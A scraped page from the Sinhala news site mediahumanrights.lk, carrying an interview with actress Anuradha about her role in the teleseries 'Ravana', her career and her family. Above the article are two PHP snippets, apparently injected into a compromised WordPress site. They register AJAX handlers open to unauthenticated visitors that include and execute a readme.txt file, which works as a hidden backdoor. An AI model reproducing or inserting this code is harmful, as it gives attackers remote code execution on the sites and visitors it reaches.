if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මට ලැබෙන හැම නිර්මාණයක්ම අභියෝගයක් - mediahumanrights.lk
mediahumanrights.lk
Entertainment Entertainment News News

මට ලැබෙන හැම නිර්මාණයක්ම අභියෝගයක්

අනුරාධා මේ දවස්වල ගොඩක් කාර්යබහුලයි වගේ?

ඇත්තටම මේ දවස්වල කාර්යබහුල වෙලා ඉන්නේ ‘රාවණ’ ටෙලි නිර්මාණය නිසා. පුෂ්පෝත්කථාගේ චරිතයට තමයි මම සම්බන්ධ වෙලා ඉන්නේ. ඒ වගේම අහස් මාලිගා ටෙලි නාට්‍යයත් මේ දවස්වල විකාශය වෙනවා.

අනුරාධාව මෙතෙක් දැකපු රාමුවෙන් එළියට ගේන ‘රාවණ’ නිර්මාණයට සම්බන්ධ වෙන්න ලැබුණේ කොහොමද?

තුෂාර තෙන්නකෝන් අයියා නාට්‍යයට චරිත තෝරද්දී සහාය අධ්‍යක්ෂවරයෙක් වන ප්‍රදීප් අයියා තමයි රාවණගේ අම්මගේ චරිතයට කෙනෙක් හොයනවා කියලා කිව්වේ. ඊට පස්සේ මම දෙරණ ආයතනයට ගියා. එහි තිර පරීක්ෂණයෙදි තුෂාර තෙන්නකෝන්, ලක්සිරි වික්‍රමගේ, චරිත් කොතලාවල කියන මහත්වරු තීරණය කරලා මට රාවණගේ මවගේ චරිතයට සම්බන්ධ වෙන්න අවස්ථාව ලබා දුන්නා. එයට මම ස්තූතිවන්ත වෙනවා.

මේ වගේ වෙනස් වැඩකට සම්බන්ධ වෙන්න ලැබෙද්දී ඒක ඔබට අභියෝගයක් වෙන්නත් ඇති?

අනිවාර්යයෙන්ම ඒ අභියෝගය තිබුණා. මේ ටෙලි නිර්මාණයේ අධ්‍යක්ෂවරයා මේ කතාව ගැන අවුරුදු විස්සක විතර රිසර්ච් එකක් කරලා තිබුණා. නාට්‍යයේ තිබෙන හැම සිද්ධියකම තිබෙන හේතු ඔහු අපිට පහදලා දෙනවා. ඉතිං එයට සාධාරණයක් කිරීමේ අභියෝගය ජය ගන්න අපේ පිටුපසින්ම හිටියේ අධ්‍යක්ෂවරයා.

මේ දවස්වල අනුරාධාගේ රංගනයටත් වෙනස් ප්‍රතිචාර ලැබෙනවා ඇති?

ඇත්තටම ලැබෙන ප්‍රතිචාර ගොඩක් හොඳයි. මාව රාවණ වගේ නිර්මාණයකින් දකින්න ලැබෙයි කියලා බොහෝ අය හිතුවේ නැහැ. ඒ වැඩේ මරු කියන ප්‍රතිචාරය තමයි බොහෝ අයගෙන් ලැබෙන්නේ. අහස් මාලිගා ටෙලි නාට්‍යයේ පොඩ්ඩිගේ චරිතයටත් ප්‍රතිචාර ලැබෙනවා.

අනුරාධා රංගනයට එන්නේ අහම්බයකින් නේද?

මම මේ ක්ෂේත්‍රයට එන්නේ අහම්බයකින්. මම වෙළෙඳ දැන්වීම් නිරූපිකාවක් විදියට ඉන්නකොට මාව දැකලා මට ටෙලි නාට්‍යයකට ආරාධනා ලැබුණා. චන්දන ධර්මප්‍රිය මහත්මයාගේ නාට්‍යයක මම පළමුවැනියෙන්ම රඟපෑවේ. ඒ වැඩ කරද්දී මට අනෝජා වීරසිංහ මහත්මියගේ අභින පාඨමාලාවටත් එකතු වෙන්න ලැබුණා. එහෙම තමයි මම මේ ගමන ආවේ. මම කොහොමත් රංගනයට එන්න ලොකු හීන හා බලාපොරොත්තු තියාගෙන ජීවත්වුණ කෙනෙක් නෙවෙයි.

රංගන ක්ෂේත්‍රයට ආවේ නැත්නම් අනුරාධා මොන ක්ෂේත්‍රය තෝරා ගනියිද?

බොහෝ වෙලාවට මට නීති ක්ෂේත්‍රයෙන් ඉදිරියට යන්න තිබ්බා. නමුත් දැන් මම මේ ක්ෂේත්‍රය තෝරා ගත්ත එක ගැන සතුටුයි.

ඔබට රංගනයේ ආරාධනා ජයද?

අලුත් නිර්මාණවලටත් ආරාධනා ලැබිලා තිබෙනවා. ඒවටත් සම්බන්ධ වෙනවා. හදිසියක් නෑ. ලැබෙන නිර්මාණ කරගෙන ඉන්නවා.

ඔබ ලැබෙන ඕනම නිර්මාණයක් භාරගන්න කෙනෙක්ද?

මම ක්ෂේත්‍රයට අලුත් නිසා ලැබෙන හැම නිර්මාණයක්ම මට අභියෝගයක්. ඒ නිසා ලොකු තෝරා ගැනීම් කරන්න ලැබෙන්නේ නැහැ. අඳින ඇඳුම් පැලඳුම්වල යම් යම් සීමා තියෙනවා. නමුත් නිර්මාණවල ලොකු තෝරාගැනීම් කරන්නේ නැහැ.

ඔබට ක්ෂේත්‍රයට ඇවිත් මේ කාලය තුළ ලැබුණු අවස්ථා ගැන සතුටු වෙන්න පුළුවන්ද?

මට ලැබුණු හොඳම අවස්ථාව තමයි රාවණ නිර්මාණය. මේ නිර්මාණය තුළ ඉන්න පිරිස දිහා බලද්දී ඒ අතරින් මටත් මේ වගේ හොඳ අවස්ථාවක් ලැබුණු එක ගැන සතුටුයි.

රංගන ක්ෂේත්‍රය ගැන එළියේ අය බොහෝ කතා කියනවා. ඔබට මේ ක්ෂේත්‍රය ගැන දැනෙන්නේ කොහොමද?

මේ ක්ෂේත්‍රය සුන්දර හරි හොඳ ආරක්ෂාවක් තියෙන තැනක්. විවිධ අය විවිධ හේතු මත දේවල් කියනවා ඇති. නමුත් මට නම් කිසිම වැරැද්දක් වෙලා නැහැ. පවුලක වගේ අය එක්ක මට වැඩ කරන්න ලැබුණේ.

ඔබ නිවේදනයට එන්නෙත් අහම්බයකින්ද?

හිරු නාළිකාවේ රියැලිටි වැඩසටහනක් එක්ක මම සම්බන්ධ වෙලා හිටියා. ඉතිං මට වැඩසටහනක් ඉදිරිපත් කරන්නත් ආරාධනා ලැබුණා. මම ඒ ආරාධනාව භාර ගත්තා.

අනුරාධාගේ රංගන ගමනට පවුලෙන් හොඳ සහායක් ලැබෙනවා ඇති?

ඔව්. මගේ අම්මා, තාත්තා, අයියා මට ලොකු සහයෝගයක් දෙනවා. ඔවුන් තමයි මගේ ශක්තිය.

ආයෙත් නැටිලිවලට ඉඩදෙන්න අදහසක් නැද්ද?

හිරු මෙගා ස්ටාර් රියැලිටි තරගයේ අවසාන වටය වෙනකල් අපි ආවා. ආයෙත් නර්තන හැකියාව පෙන්වන්න අවස්ථාවක් ලැබුණොත් සම්බන්ධ වෙනවා.

අනුරාධා දැන් පෙම්වතියක් වෙන්න ඇති?

නැහැ, මම පෙම්වතියක් නෙවෙයි.

ක්ෂේත්‍රයේ අයගෙන් ආදර යෝජනා එන්නේ නැද්ද?

එහෙම ආදර යෝජනා ඇවිත් නැහැ. මට ගැහැනු – පිරිමි භේදයක් නැතිව යාළුවෝ ඉන්නවා. මට පිරිමි යාළුවෝ ගොඩක් ඉන්නවා. හොඳ සහෝදරත්වයකින් ඔවුන් එක්ක වැඩ කරනවා.

උපුටා ගැනීම මව්බිම පුවත්පත ඇසුරෙනි

Related posts

ජනතා අපේක්ෂා සාක්ෂාත් කරගැනීමට තැබූ පියවර නව වසරේදී තවත් ශක්තිමත් කරන බවට ජනපතිගෙන් ප‍්‍රකාශයක්

Shiran Viraj

21 දිනලා ක්‍ෂණිකව දිවුරුම් දෙනවා.. ක්‍ෂණිකව පාර්ලිමේන්තුව විසුරුවනවා…

Shiran Viraj

නරක් වු මාළු කිලෝ 240ක් විනාශ කරයි

Shiran Viraj